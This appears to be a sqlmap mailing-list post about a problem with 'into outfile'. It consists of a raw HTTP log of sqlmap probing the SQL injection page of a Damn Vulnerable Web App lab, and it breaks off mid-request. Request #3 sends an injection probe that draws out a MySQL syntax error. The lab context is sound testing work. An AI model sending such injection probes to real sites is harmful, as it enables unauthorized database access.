[sqlmap-users] issue while using into outfile
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] issue while using into outfile
|
From: Ahmed S. <ah...@is...> - 2011-09-05 10:29:33
|
HTTP request [#1]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#1] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:53 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#2]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#2] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:54 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#3]: GET /vulnerabilities/sqli/?id=test%27%29%28%29%29%22%29%22%22%29%22%23&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#3] (200 OK): Content-length: 169 X-powered-by: PHP/5.3.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test%27%29%28%29%29%22%29%22%22%29%22%23&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Date: Fri, 02 Sep 2011 00:47:54 GMT Content-type: text/html <pre>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')())")"")"#'' at line 1</pre> ############################################################################ HTTP request [#4]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#4] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:54 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#5]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#5] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#6]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#6] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#7]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#7] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( 